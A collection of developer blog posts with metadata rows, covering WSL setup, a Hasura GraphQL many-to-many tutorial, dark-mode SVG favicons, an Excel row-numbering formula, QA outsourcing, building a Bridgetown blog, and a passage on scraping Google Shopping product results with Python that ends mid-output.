try to go following path in normal windows folder `\\wsl$` > You will see Ubuntu Folder >Right click on Ubuntu folder icon > Select Map network drive (Z:) > Now Z: can be used as other partition/drive
Now Ubuntu is visible on drive. So you can easily look up for your files and also open folders in github destkop.
7)Now you can serve your website as you used to. If for example you served your files with `npm start` successfully but there is no signs of life at localhost. Try this. Create .wslconfig file in C:/Users/\<username>/.wslconfig
Inside .wslconfig, write following lines and save it:
[wsl2]
localhostForwarding=true
Then open command line windows: >>>`wsl --shutdown`
Reload vscode window.
8)Since you can reach both wsl and windows folders it is possible to run project in windows file system from wsl. But performance is so poor. You probably want to move your project folder to the wsl. So in linux use following path to store your projects. `home/<username>/`. You can also create `home/<username>/webprojects/` folder.
source: [https://github.com/microsoft/WSL/issues/5298](https://github.com/microsoft/WSL/issues/5298) | mefaba | |
740,550 | Build Sports Team API with GraphQL - Hasura - Part 4 | This post is part of a series of post and so if you haven't read the previous one, please read that... | 13,301 | 2021-06-27T05:39:08 | https://www.eternaldev.com/blog/build-sport-team-api-with-graphql-hasura-part-4/ | graphql, postgres | This post is part of a series of post and so if you haven't read the previous one, please read that and come back and we will wait :)
## Objectives of this post
1. Introduction
2. What is many-to-many relationship
3. Creating the players table
4. How to create many-to-many relationship
5. Creating the table in Hasura for player recruitment
6. Adding foreign key to the player recruitment table
7. Adding array relationships in tables
8. Adding data to the recruitment table
9. Query the data
## Introduction
In the previous post, we learned how to create one-to-many relationship with the teams table.
[BUILD SPORTS TEAM API WITH GRAPHQL - HASURA - PART 3](https://www.eternaldev.com/blog/build-sport-team-api-with-graphql-hasura-part-3/)
In this post, we will learn about creating a many-to-many relationship and how to add much awaited players to the team.
## What is many-to-many relationship
Consider the example of players playing for a particular sport, they will be part of many team whether it is their national team, club team, league team and so on. Also when you consider a team, there will be many player who are part of the team. So it many to many relationship between teams and players.
## Creating the players table
Column name: **id**, Type: Integer (auto-increment)
Column name: **created_at**, Type: Timestamp
Column name: **updated_at**, Type: Timestamp
Column name: **name**, Type: Text
Column name: **age**, Type: Integer
Column name: **jersey_number**, Type: Integer, Nullable: true (This field can be left empty)
Primary Key: id

## How to create many-to-many relationship
When we are doing one-to-one relationship or one-to-many relationships, we can just add a new column and set it as a foreign key and create a new relationship in Hasura. Since we want to have list of key of the players table in teams table, we cannot add a new column
We need to create a new table which represents the relationship between players and teams. In doing so, each row in that new table will represent a player belonging to one team.
We can make use of this new table to add more info to the association between players and team by setting up a date of joining the team, and salary details of the players for that team and so on.

## Creating the table in Hasura for player recruitment
Create a new table with the following fields based on the image below. You can add any relavant data you would need when you are forming this many-to-many relationship

## Adding foreign key to the player recruitment table
After creating the table, we need to specify that the two column `player_id` and `team_id` are foreign key pointing to their respective tables


## Adding array relationships in tables
Now, we just need to add the array relationship on both the tables which will let us access the list of players from the teams query and access the list of teams from the players query.
Open the `Relationship` tab in the players table and then add the suggested array relationship and name the relationship as `teams`

Open the `Relationship` tab in the teams table and then add the suggested array relationship and name the relationship as `players`

After we add the array relationship, we will be able to access the id of the player from the teams query when we drill down. This might not be very useful as we need the player info to display in the UI. So we need to add object relationship in the recruitment table like one-to-one relationship which will let us further drill down to the name of the player or team which they are part of.
Finally add the two suggested object relationship in the `player_team_recruitments` table which we created before

## Adding data to the recruitment table
We have all the relationships definded, so next step is populate the data in the table. We can just take the primary key of the player and primary key of the team which they belong and then create row with that details

## Query the data
We will all the hard work till now to setup the api which has proper relationships between the players and teams. Now we can reap the benefits by using the query to fetch those data in a single query
Lets look at the querying the list of team with all the players
```
query MyQuery {
teams {
team_name
players {
player {
name
age
}
}
}
}
OUTPUT:
{
"data": {
"teams": [
{
"team_name": "Australia Cricket Team",
"players": [
{
"player": {
"name": "Steve Smith",
"age": 31
}
}
]
},
{
"team_name": "Indian Cricket Team",
"players": [
{
"player": {
"name": "Virat Kolhi",
"age": 30
}
},
{
"player": {
"name": "Rohit Sharma",
"age": 28
}
},
{
"player": {
"name": "MS Dhoni",
"age": 34
}
},
{
"player": {
"name": "Bhuvaneshvar Kumar",
"age": 29
}
},
{
"player": {
"name": "Jasprit Bumrah",
"age": 26
}
}
]
},
{
"team_name": "England Cricket Team",
"players": [
{
"player": {
"name": "Joe Root",
"age": 30
}
}
]
}
]
}
}
```
Lets look at the querying the list of player and their teams
```
query MyQuery {
players {
name
teams {
team {
team_name
}
}
}
}
OUTPUT:
{
"data": {
"players": [
{
"name": "Virat Kolhi",
"teams": [
{
"team": {
"team_name": "Indian Cricket Team"
}
}
]
},
{
"name": "Rohit Sharma",
"teams": [
{
"team": {
"team_name": "Indian Cricket Team"
}
}
]
},
{
"name": "MS Dhoni",
"teams": [
{
"team": {
"team_name": "Indian Cricket Team"
}
}
]
},
{
"name": "Bhuvaneshvar Kumar",
"teams": [
{
"team": {
"team_name": "Indian Cricket Team"
}
}
]
},
{
"name": "Jasprit Bumrah",
"teams": [
{
"team": {
"team_name": "Indian Cricket Team"
}
}
]
},
{
"name": "Steve Smith",
"teams": [
{
"team": {
"team_name": "Australia Cricket Team"
}
}
]
},
{
"name": "Joe Root",
"teams": [
{
"team": {
"team_name": "England Cricket Team"
}
}
]
}
]
}
}
```
## Next Steps
This post conclude the series of post on Data Modelling with example.
Stay tuned by subscribing to our mailing list and joining our Discord community
[Discord](https://discord.gg/AUjrcK6eep) | eternal_dev |
751,714 | DZone Contributor of the Month award | The DZone tech publishing site selected me as their Editors’ Pick Contributor of the Month for June... | 0 | 2021-07-06T21:09:44 | https://phoenixtrap.com/2021/07/06/dzone-contributor-of-the-month-award/ | award, dzone, perl | ---
title: DZone Contributor of the Month award
published: true
date: 2021-07-06 18:00:43 UTC
tags: award,DZone,Perl
canonical_url: https://phoenixtrap.com/2021/07/06/dzone-contributor-of-the-month-award/
---
The [DZone](https://dzone.com/) tech publishing site selected me as their Editors’ Pick Contributor of the Month for June 2021! Here’s my (blessedly brief) acceptance speech during their monthly awards ceremony. (Fast-forward to [54:88](https://youtu.be/wt-unjqS1oA?t=3288).)
{% youtube wt-unjqS1oA %}
Unfortunately, they’ve just started to de-prioritize content syndicated from elsewhere due to Google not indexing it. Since every article has to go through a moderation and editing process, this means that I may not be able to fulfill my promise to post new Perl content there every week. You can still find it [here on phoenixtrap.com](https://phoenixtrap.com/tag/perl/), of course. ☺ | mjgardner |
752,132 | Creating Favicons for Light and Dark Mode UIs | Dark mode UIs are becoming increasingly popular. Often the legibility of a favicon is not great in... | 0 | 2021-07-07T06:29:24 | https://dev.to/wrux/creating-favicons-for-light-and-dark-mode-uis-3o74 | webdev, css | Dark mode UIs are becoming increasingly popular. Often the legibility of a favicon is not great in light or dark mode, so a dynamic solution is needed to display correctly in both modes.
Luckily, SVG favicons provide the functionality we need. If you are not using SVG favicons on your site yet, then go and change them now. You can drop those 20+ PNG icons in favour of a single SVG.
So here's the thing, we can use CSS in SVGs, meaning you can also use the [prefers-color-scheme](https://developer.mozilla.org/en-US/docs/Web/CSS/@media/prefers-color-scheme) media query to adjust the SVG.
Here's an example icon with some CSS to set the default path fill colour to black. The media query then changes the fill colour to white if the user has dark mode enabled.
```html
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 429.056 429.056">
<style>
path { fill: #000; }
@media (prefers-color-scheme: dark) {
path { fill: #fff; }
}
</style>
<path d="M413.696 182.272h-21.504v-68.096c-.512-8.192-7.168-14.848-15.36-15.36H229.888V4.608h-30.72v94.208H52.224c-8.192.512-14.848 7.168-15.36 15.36v68.096H15.36c-8.704 0-15.36 6.656-15.36 15.36v101.376c0 8.704 6.656 15.36 15.36 15.36h21.504v94.72c.512 8.192 7.168 14.848 15.36 15.36h324.608c8.192-.512 14.848-7.168 15.36-15.36v-94.72h21.504c8.704 0 15.36-6.656 15.36-15.36V197.632c0-8.704-6.656-15.36-15.36-15.36zm-313.344 36.352c0-24.576 19.968-44.544 44.544-44.544s44.544 19.968 44.544 44.544-19.968 44.544-44.544 44.544-44.544-19.968-44.544-44.544zm181.76 133.632H146.944v-30.72h135.168v30.72zm46.592-133.632c0 24.576-19.968 44.544-44.544 44.544-25.088 0-45.056-19.968-45.568-44.544 0-25.088 19.968-45.056 44.544-45.568 24.576-.512 45.056 19.968 45.568 44.544v1.024z" />
</svg>
```
You just need to link your new `icon.svg` file in the document head:
```html
<link rel="icon" href="/assets/icon.svg" />
```
Here's the outcome. You might need to reload the page when switching between light/dark mode UI.

 | wrux |
752,374 | Excel Formulas to Add Row Numbers and Skip Blanks ~ Simple Guide!! | In Excel, we can drag the fill handle to fill the sequence numbers in a column quickly and easily,... | 0 | 2021-07-12T03:22:26 | https://geekexcel.com/excel-formulas-to-add-row-numbers-and-skip-blanks-simple-guide/ | excelformula, excelformulas | ---
title: Excel Formulas to Add Row Numbers and Skip Blanks ~ Simple Guide!!
published: true
date: 2021-07-07 10:19:46 UTC
tags: ExcelFormula,Excelformulas
canonical_url: https://geekexcel.com/excel-formulas-to-add-row-numbers-and-skip-blanks-simple-guide/
---
In Excel, we can drag the fill handle to fill the sequence numbers in a column quickly and easily, but sometimes we need to number the rows based on adjacent cells. For example, if the cells contain value then number them, if there are blank cells, leave the sequence blank as well. How could you solve this job? Here we will show the simple tricks to **add the row numbers and skip the cells which are blanks in Excel**. Let’s see them below!! Get an official version of ** MS Excel** from the following link: [https://www.microsoft.com/en-in/microsoft-365/excel](https://www.microsoft.com/en-in/microsoft-365/excel)
[](https://geekexcel.com/excel-formulas-to-add-row-numbers-and-skip-blanks-simple-guide/add-row-numbers-and-skip-blanks/#main)<figcaption id="caption-attachment-48660">Add row numbers and skip blanks</figcaption>
## Generic Formula:
- You can use the below formula to add sequential row numbers to a list of data and skip the cells that are blank in Excel.
**=[IF](https://geekexcel.com/use-if-function-in-microsoft-excel-365-simple-steps/)([ISBLANK](https://geekexcel.com/how-to-use-isblank-function-in-microsoft-excel-365/)(A1),””,[COUNTA](https://geekexcel.com/how-to-use-excel-counta-function-in-office-365-with-examples/)($A$1:A1))**
## Syntax Explanations:
- **IF** – In Excel, the [**IF function**](https://geekexcel.com/use-if-function-in-microsoft-excel-365-simple-steps/) helps to return one value for a TRUE result, and another for a FALSE result.
- **ISBLANK** – The [**ISBLANK function**](https://geekexcel.com/how-to-use-isblank-function-in-microsoft-excel-365/) will return TRUE when a cell contains is empty, and FALSE when a cell contains any text or not an empty case.
- **COUNTA** – This function counts the number of cells that are non-empty and returns the output in numbers. Read more on the **[COUNTA function](https://geekexcel.com/how-to-use-excel-counta-function-in-office-365-with-examples/)**.
- **A1** – It represents the input cell.
- **Comma symbol (,)** – It is a separator that helps to separate a list of values.
- **Parenthesis ()** – The main purpose of this symbol is to group the elements.
## Practical Example:
Let’s consider the below example image.
- First, we will enter the input values in **Column B.**
- Here we are going to add sequential row numbers to a list of data and skip the cells that are blank.
<figcaption id="caption-attachment-48662">Input Ranges</figcaption>
- Select any cell and type the above-given formula.
<figcaption id="caption-attachment-48661">Enter the formula</figcaption>
- Finally, press the ** ENTER** key, you can get the result as shown below.
<figcaption id="caption-attachment-48663">Result</figcaption>
## Verdict:
So yeah guys this is **how you can add the row numbers and skip the cells which are blanks in Excel**. Leave a **comment** or **reply** below to let me know what you think!
Thank you so much for visiting **[Geek Excel](https://geekexcel.com/)!! **If you want to learn more helpful formulas, check out [**Excel Formulas**](https://geekexcel.com/excel-formula/) **!! **
### Read Ahead:
- **[Excel Formulas to Get the Profit Margin Percentage ~ Quickly!!](https://geekexcel.com/excel-formulas-to-get-the-profit-margin-percentage/)**
- **[How to Insert a Date or Formatted Date in Excel Office 365?](https://geekexcel.com/how-to-insert-a-date-or-formatted-date-in-excel-office-365/)**
- **[Excel Formulas to Calculate the Surface Area of a Cone ~ Easy Tricks!!](https://geekexcel.com/excel-formulas-to-calculate-the-surface-area-of-a-cone/)**
- **[Excel Formulas to Get the Percentage Discount ~ Useful Tricks!!](https://geekexcel.com/excel-formulas-to-get-the-percentage-discount/)**
| excelgeek |
752,445 | The Difference Between Offshore Software Outsourcing and Onshore Outsourcing | Nowadays, many leading businesses and companies opt for software outsourcing services to increase... | 0 | 2021-07-07T12:11:35 | https://testfort.com/blog/the-difference-between-onshore-and-offshore-software-outsourcing | testing, apptesting, qatesting, qaoutsourcing | Nowadays, many leading businesses and companies opt for software outsourcing services to increase productivity, reduce costs on hiring an in-house team of remote developers, and get effective results. Generally, you can choose between onshore and offshore software outsourcing depending on your project objectives and personal preferences. You might be wondering what is the difference between onshore and offshore [software development outsourcing companies] (https://qarea.com/). Below, you will find a detailed explanation and benefits of using each type.
#What Is Onshore Software Outsourcing?
When we are talking about onshore software outsourcing services, we mean hiring a team of individual software developers located in your country. The main advantage of hiring an onshore team of developers is the geographical proximity to your business. The closer your team is to you, the easier it is to monitor their progress and all project-related activities. The contractor can even visit a team of developers personally from time to time to make the collaboration as effective and productive as possible.
#High Pricing That Includes Culture Code and Legal Framework
One of the main benefits of onshore outsourcing is the absence of cultural differences and language barrier as you live and work in the same country. So you won’t have problems with communication and understanding each other. Also, the time zone is the same, and you don’t have to wait long for an answer due to the time difference. It will be much easier to discuss project details and address any occurring issues.
Collaborating with an onshore company means that both of you should comply with your country’s regulations, and it will be easier to determine and resolve issues. However, the main downside of the onshore developers is high labor costs. Yes, you can find highly skilled and accomplished professionals close to you, but due to the talent shortage, it will be much longer and more difficult to search. The hourly rate for the onshore software development services will be approximately $100, and the number can even attain $125 per hour. This price is probably not convenient for all companies and businesses. So, if you are on a budget, consider an offshore option.
#What Is Offshore Software Development?

Offshore software outsourcing means recruiting a team of developers abroad to work remotely. Generally, companies outsourcing their projects, usually collaborate with teams from India, China, and Western European countries such as Ukraine, Poland, Czech Republic, etc.
The main advantage of an offshore [development company] (https://qarea.com/) is the low labor cost of approximately $20 per hour. This flat hourly rate cannot be beaten by other options. Thus, offshoring developers is the most convenient and affordable choice for many companies and startups who cannot afford to hire an expensive onshore team.
>“Collaborating with offshore software developers, you will most likely have to compromise cultural and time zone differences, but not technical expertise or budget (if the right vendor’s chosen).”
>Expert, TestFort
It’s easy to find offshore professionals with great software development expertise and excellent verbal and written command of English. Generally, all offshore [software development companies] (https://qarea.com/) offer high-quality service and meet all the customer’s requirements.
Among the main drawbacks of collaboration with teams abroad is the time zone difference, which complicates the communication between developers and contractors. It is always possible to keep in touch via phone, Skype, chats, or emails, but delays cannot be avoided in this case. It will be much more difficult to address eventual issues, discuss all the details, and monitor the process and quality of work.
Whereas an offshore team speaks English well, there still could arise misunderstandings due to cultural differences, so it might be harder in some cases to understand requirements and instructions. In addition, if some issue with foreign workers occurs, it will be challenging to resolve it as you will be supposed to deal with other county’s regulation and court.
#QA & Software Testing Outsourcing
Traditionally, people are used to discussing software outsourcing in the context of development. However, as IT outsourcing was becoming more popular and widely used across industry-leading companies like Amazon, Apple, Skype, etc., services offered on the market expanded greatly. These days, you can find a relevant professional or a team to cover basically any stage of a software development project, from technical consulting to [product design] (https://qarea.com/services/ui-ux-design), business analysis, and, of course, software testing.
Quality assurance takes a special place in the range of all offshore software outsourcing services, primarily because of its great benefits for the end product. Having a third-party QA team that tests your application is a sure way to find out all the weaknesses of your product. In the case of testing, the fact that an offshore team doesn’t work for you directly and was not involved in the product development since day one makes the QA process as unbiased as it could possibly be.
#QA outsourcing service list
If you ever think of a distant quality assurance company to hire, we would recommend you to look for one that specializes in software testing specifically. The range of services such companies offer does not end with just “testing”. Depending on the type of software under examination, tech stack it is built on, and your long-term plans with this particular product, you will need at least one type of the following procedures:
- [Functionality testing] (https://testfort.com/functional-testing);
- UI/UX testing;
- Compatibility check;
- [Manual QA] (https://testfort.com/manual-testing);
- [Automated QA] (https://testfort.com/automated-testing);
- Security testing;
- Localization check.
All of these can be implemented by nearshore and offshore located teams equally well. However, deciding between these two options, keep in mind that distance at times can be even more beneficial for clearer testing results rather than close control. The users of your software product most likely won’t be limited to a certain location, which means you don’t have to put your QA team anywhere near yourself to find out if your product’s good enough to release it.
#Choosing Between Onshore and Offshore Development Outsourcing
Before you [hire a team of developers] (https://qarea.com/hire-developers), define clearly your priorities. Then, you can choose whether you want to go for an offshore or onshore team of developers. Each option has its own benefit, so consider all the pros and cons of onshore and offshore development outsourcing carefully. Hire developers that best suit your needs perfectly and create a top-notch quality product together.
| testfort_inc |
752,485 | Build a blog with Bridgetown | Table of Contents Setup Ruby component and plugin Deployment and... | 0 | 2021-07-07T13:43:04 | https://fpsvogel.com/posts/2021/build-a-blog-with-bridgetown | webdev, jamstack, ruby, tutorial | ---
title: Build a blog with Bridgetown
subtitle: templates, components, and plugins all in Ruby
---
{% collapsible **Table of Contents** %}
1. [Setup](#1-setup)
2. [Ruby component and plugin](#2-ruby-component-and-plugin)
3. [Deployment and beyond](#3-deployment-and-beyond)
4. [Conclusion](#conclusion)
{% endcollapsible %}
**UPDATE, January 2022:** *Bridgetown 1.0 beta has been released! 🎉 I've updated the setup instructions below.*
Once upon a time, in ye olden days of 2008, the world saw the release of Jekyll, the first popular static site generator. Fast forward 2+ decades, and its popularity has been eclipsed by newer JavaScript counterparts like Gatsby and Eleventy. And why not? Jekyll runs on Ruby *(boo!)* so it is unsexy and [obviously super slow](https://css-tricks.com/comparing-static-site-generator-build-times/#jekyll-the-odd-child). (Hint: in that article, read down to where the author notes, "Also surprising is that Jekyll performed faster than Eleventy for every run.")
Sarcasm aside, Jekyll seems to be built on a solid enough foundation, but unfortunately it has not received a lot of updates in recent years. Is this another arena where, as they say, Ruby is dead?
Enter [Bridgetown](https://edge.bridgetownrb.com/), a fork of Jekyll which aims to compete toe-to-toe with its modern JS cousins, providing even more Ruby tools for building static sites. Very exciting.
Many of Bridgetown's Ruby upgrades are already released, so I (happy for any chance to write Ruby) rebuilt and extended this blog with Bridgetown. Here's how I did it. Note that these instructions apply to [Bridgetown 1.0](https://edge.bridgetownrb.com/release/beta-1-is-feature-complete/), the latest version at the time of writing. Also note that a knowledge of Ruby is assumed here, but not necessarily any prior experience in building a static site.
You can see the final result of this process in [my site's GitHub repo](https://github.com/fpsvogel/blog-2021). The site itself is at [fpsvogel.com](https://fpsvogel.com/).
## 1. Setup
1. Follow the steps on Bridgetown's [Getting Started](https://edge.bridgetownrb.com/docs) page.
- To create the site, I ran `bridgetown new blog -t erb`. The added option is to use ERB tempates, rather than the default of Liquid.
- See also [all the command line options](https://edge.bridgetownrb.com/docs/command-line-usage).
- If you already know of some bundled configurations that you need (see below), you can include them in the `new` command. In my case: `bridgetown new blog -t erb -c turbo,stimulus,bt-postcss`
2. Add [bundled configurations](https://edge.bridgetownrb.com/docs/bundled-configurations) that you need. In my case:
- [Turbo](https://edge.bridgetownrb.com/docs/bundled-configurations#turbo) for faster page transitions.
- [Stimulus](https://edge.bridgetownrb.com/docs/bundled-configurations#stimulus) for adding JavaScript sprinkles (more on that below). Alternatively you could use LitElement, as explained in [the Components doc](https://edge.bridgetownrb.com/docs/components) and in [this guide to web components on Fullstack Ruby](https://www.fullstackruby.dev/fullstack-development/2022/01/04/how-ruby-web-components-work-together/).
- [Recommended PostCSS plugins](https://edge.bridgetownrb.com/docs/bundled-configurations#bridgetown-recommended-postcss-plugins). I also installed [this extra PostCSS plugin](https://github.com/postcss/postcss-scss#2-inline-comments-for-postcss) that adds support for inline comments in CSS files.
3. Install [plugins](https://edge.bridgetownrb.com/docs/plugins) that you need. In my case:
- [SEO tags](https://github.com/bridgetownrb/bridgetown-seo-tag)
- [Sitemap generator](https://github.com/ayushn21/bridgetown-sitemap)
- [Atom feed](https://github.com/bridgetownrb/bridgetown-feed)
- [SVG inliner](https://github.com/ayushn21/bridgetown-svg-inliner)
4. Set your preferred [permalink style](https://edge.bridgetownrb.com/docs/content/permalinks).
5. Set up [pagination](https://edge.bridgetownrb.com/docs/content/pagination).
6. Set your site's info in `src/_data/site_metadata.yml`.
7. Kickstart your site's design with a CSS theme. I chose [holiday.css](https://holidaycss.js.org/), a classless stylesheet for semantic HTML. Or you could use an actual Bridgetown theme, such as [Bulmatown](https://github.com/whitefusionhq/bulmatown). (That's the only Bridgetown theme as of January 2022, but I expect more will come soon from the community.)
8. Add a Pygments CSS theme for code syntax highlighting.
- Either [download one of the handily premade CSS files](https://jwarby.github.io/jekyll-pygments-themes/languages/ruby.html), or [pick from the full list](https://pygments.org/demo/#try) then [install Pygments and make it generate a CSS file](https://stackoverflow.com/a/14989819/4158773). (I picked one of the premade stylesheets and then created a second one to override some of the colors.)
- Place the CSS file in `frontend/styles`.
- Import it into `frontend/styles/index.css`: for example, for Monokai place `@import "monokai.css";` near the top of `index.css`.
## 2. Ruby component and plugin
Next I designed and built my site, a process which was mostly unremarkable, except for one thing: I built a Ruby component and plugin for a complex, data-heavy part of a page. For simpler parts of a page I just used partials, such as `_tweet_button.erb`. But for any significant manipulation of data prior to rendering, building a Ruby component makes more sense. In my case, I wanted a "Reading" page that lists titles from my `reading.csv` file (my homegrown alternative to Goodreads), including only books that I rated at least a 4 out of 5.
Following [the doc on Ruby components](https://edge.bridgetownrb.com/docs/components/ruby), I created a `ReadingList` component in `_components/reading_list.rb`, and its template `_components/reading_list.erb`.
After writing the HTML + ERB + CSS for the reading list element, I used Stimulus to add JavaScript sprinkles to expand/collapse rows with reading notes or long blurbs, to filter rows by rating or genre, and to sort rows (though sorting is disabled on my site, since I went with the minimal "favorite or not" way of showing ratings).
Then I fleshed out `reading_list.rb` to load my reading list and provide data for the template `reading_list.erb`. The CSV-parsing code is pretty complex, so I separated it out [into a gem](https://github.com/fpsvogel/reading-csv).
Thanks to a tip (one of many) from the Bridgetown creators on [the Discord server](https://discord.gg/Cugms94QFM), I realized my Ruby component had way too much logic in it which should be separated out into a plugin. So I dove into [the docs on plugins](https://edge.bridgetownrb.com/docs/plugins) and moved nearly all of my component's code into a plugin.
So now the plugin parses my CSV file (using my parsing gem) and saves it into the site's data. Then my component's `.rb` file pulls that data into instance variables. Finally, the ERB template uses the instance variables as it displays the reading list.
If you create a plugin and want to make it more easily available to other Bridgetown site creators, you should [make it into a gem](https://edge.bridgetownrb.com/docs/plugins#creating-a-gem) and possibly create an [automation](https://edge.bridgetownrb.com/docs/automations) for it. I didn't for my reading list plugin, because the intersection of people who track their reading in a CSV file and people who will make a Bridgetown site is… very few people, I'm sure.
## 3. Deployment and beyond
Publishing my site was as simple as [choosing the GitHub repo on Netlify](https://www.netlify.com/blog/2016/09/29/a-step-by-step-guide-deploying-on-netlify/) and [configuring the custom domain](https://docs.netlify.com/domains-https/custom-domains/).
One possible improvement remains. Currently, to update the reading list I must delete it (`_data/reading.yml`) and rebuild the site locally (so that my `reading.csv` can be re-parsed) before pushing it to be built and deployed on Netlify. I could avoid these manual steps by taking advantage of the fact that my `reading.csv` is automatically synced to Dropbox: I could change my plugin to connect to Dropbox and update the list from there instead of from the copy on my local machine.
## UPDATE: It's alive!
Now in October, three months later, I've made the improvement proposed above. My Bridgetown plugin now connects to my Dropbox account, reads my `reading.csv` file from there, parses newly added items, and adds them to my site's data. I'm storing my Dropbox keys in Netlify environment variables, which are passed into Bridgetown in `ENV`. Now my reading list can be updated in a Netlify build, without me having to first build it locally and push it.
This paved the way for an even cooler improvement: I followed [this guide](https://www.stefanjudis.com/snippets/how-to-schedule-jamstack-deploys-with-netlify-and-github/) to setting up automatic Netlify redeploys via GitHub Actions, and now my site rebuilds itself every week. This means that my site's Reading page is synced weekly to my `reading.csv`, and it's completely automatic! Now I'm starting to see how static sites, in spite of their simplicity, can feel quite dynamic if they are automatically rebuilt often, using content added via APIs.
## Conclusion
Besides Bridgetown itself, I learned a number of new things in this project, such as how to use Stimulus to make a page dynamic with a bit of JavaScript.
But what I really loved was using what I *already* knew (Ruby) in a completely new way. Bridgetown is doing a wonderful job of bringing the joy of Ruby into the world of modern static site generators. | fpsvogel |
752,584 | QA and testing of e-commerce | Is it necessary to run detailed testing of e-commerce products? Let's just imagine how many issues... | 0 | 2021-07-07T14:54:55 | https://dev.to/hiretesterteam/qa-and-testing-of-e-commerce-ak9 | testing, ecommerce | Is it necessary to run detailed testing of e-commerce products? Let's just imagine how many issues can happen, for example, in a payment system, orders arrangement and management, delivery monitoring and so on.
To prevent possible bottlenecks, the following types of testing can be run:
- Functional testing
- UI/UX testing
- Usability testing
- Integration testing
- User acceptance testing.
After the detailed analysis, a QA team can provide recommendations and set up the testing process so that no important details will be left behind.
Considering the necessity of testing your e-commerce solution? Get a reliable partner for QA tasks with the HireTester team: info@hire-tester.com
https://hire-tester.com/ | hiretesterteam |
752,778 | Scrape Google Shopping Product Results with Python | Contents: intro, imports, what will be scraped, process, code, links, outro. Intro This... | 12,790 | 2021-07-16T09:44:58 | https://serpapi.com/blog/scrape-google-shopping-product-results-with-python/ | python, webscraping, tutorial, datascience | Contents: intro, imports, what will be scraped, process, code, links, outro.
### Intro
This blog post is a continuation of Google's web scraping series. Here you'll see how to scrape Product Results using Python using `beautifulsoup`, `requests`, `lxml` libraries. An alternative API solution will be shown.
### Imports
```python
import requests, lxml, json
from bs4 import BeautifulSoup
from serpapi import GoogleSearch
```
### What will be scraped

### Process
1. Found a container will all data.
2. Used nested `for` loops whenever data is not extracted fully. *Note that nested `for` loops could be pain in the neck if you want to get a structured `json`, e.g. `.update()` existing `dict()`, but I could be wrong here. These words are based on my experience.*
### Code
```python
import requests, lxml
from bs4 import BeautifulSoup
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19582"
}
response = requests.get("https://www.google.com/shopping/product/14506091995175728218?hl=en", headers=headers)
soup = BeautifulSoup(response.text, 'lxml')
def get_product_results_data():
for page_result in soup.select('.sg-product__dpdp-c'):
title = soup.select_one('.sh-t__title').text
reviews = soup.select_one('.aE5Gic span').text.replace('(', '').replace(')', '')
rating = soup.select_one('.UzThIf')['aria-label'].replace('stars', '').replace(' out of ', '.').strip()
description = soup.select_one('.sh-ds__trunc-txt').text
# · = " · " dot separator
extensions = soup.select_one('.Qo4JI').text.split(' · ')
print(f'{title}\n{reviews}\n{rating}\n{description}\n{extensions}\n')
for prices in page_result.select('.o4ZIje'):
price = prices.text.replace('(', '').replace(')', '').split(' + ')[0]
print(price)
for review_table in page_result.select('.aALHge'):
number_of_stars = review_table.select_one('.rOdmxf').text
number_of_reviews = review_table.select_one('.rOdmxf').next_sibling['aria-label'].split(' ')[0]
print(f'{number_of_stars}\n{number_of_reviews}')
for user_review in page_result.select('.XBANlb'):
title = user_review.select_one('.P3O8Ne').text
rating = user_review.select_one('.UzThIf')['aria-label'].split(' ')[0]
date = user_review.select_one('.ff3bE').text
desc = user_review.select_one('.g1lvWe div').text
source = user_review.select_one('.sPPcBf').text.replace(' ', ' ')
print(f'\n{title}\n{rating}\n{date}\n{desc}\n{source}')
print('----------------------------------------------------')
# get link to use in another func() that will extract other reviews
all_reviews_link = f"https://www.google.com{soup.select_one('a.internal-link.JKlKAe.Ba4zEd ')['href']}"
return all_reviews_link
----------------------
'''
Google Pixel 4 White 64 GB, Unlocked
632
4.5
Point and shoot for the perfect photo. Capture brilliant color and control the exposure balance of different parts of your photos. Get the shot without the flash. Night Sight is now faster and easier to use it can even take photos of the Milky Way. Get more done with your voice ...
['Google', 'Pixel Family', 'Pixel 4', 'Android', '5.7 inches screen', 'Facial Recognition', '8 MP Front Camera', 'Smartphone', 'Wireless Charging', 'Unlocked']
5 star
362
4 star
90
3 star
53
2 star
34
1 star
93
Google, PLEASE bring back the fingerprint scanner!
1
November 24, 2020
I will start by saying I am usually a huge fan of all things Google. My wife and I had the original Pixel for several years and raved about them to anyone who would listen. The batteries were finally starting to fail and it was time to get new phones. We both went for the Pixel 4 thinking we would get the same great phone we had loved for years. Even though I was disappointed right away, I waited a few months to leave a review to see if I just needed to get used to it. Now, months later, I can safely say I'm disappointed. I still cannot get over the loss of the backside fingerprint scanner. The facial recognition that took its place is useless 80% of the time (it won't work if you're wearing a face mask or in low lighting), 10% of the time it unlocks my phone unintentionally ... More
Justin Thielman · Review provided by Google
'''
```
### Get more reviews
Essentially, the URL is coming from the `get_product_results_data()` function that `return` `all_reviews_link` variable.
```python
import requests, lxml
from bs4 import BeautifulSoup
from google_get_product_results import get_product_results_data
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19582"
}
def get_all_reviews():
response = requests.get(get_product_results_data(), headers=headers)
soup = BeautifulSoup(response.text, 'lxml')
for user_review in soup.select('.z6XoBf'):
try:
title = user_review.select_one('.P3O8Ne').text
except:
title = None
rating = user_review.select_one('.UzThIf')['aria-label'].split(' ')[0]
date = user_review.select_one('.ff3bE').text
desc = user_review.select_one('.g1lvWe div').text
source = user_review.select_one('.sPPcBf').text.replace(' ', ' ')
print(f'{title}\n{rating}\n{date}\n{desc}\n{source}')
```
### Combining two functions together:
```python
from google_get_product_results import get_product_results_data
from google_get_all_product_results_reviews import get_all_reviews
print('Product data:')
get_product_results_data()
print('All reviews:')
get_all_reviews()
------------------
'''
Product data:
Google Pixel 4 White 64 GB, Unlocked
629
4.5
Point and shoot for the perfect photo. Capture brilliant color and control the exposure balance of different parts of your photos. Get the shot without the flash. Night Sight is now faster and easier to use it can even take photos of the Milky Way. Get more done with your voice ...
['Google', 'Pixel Family', 'Pixel 4', 'Android', '5.7 inches screen', 'Facial Recognition', '8 MP Front Camera', 'Smartphone', 'Wireless Charging', 'Unlocked']
$598.95
$598.95
5 star
361
4 star
90
3 star
53
2 star
33
1 star
92
Google, PLEASE bring back the fingerprint scanner!
1
November 24, 2020
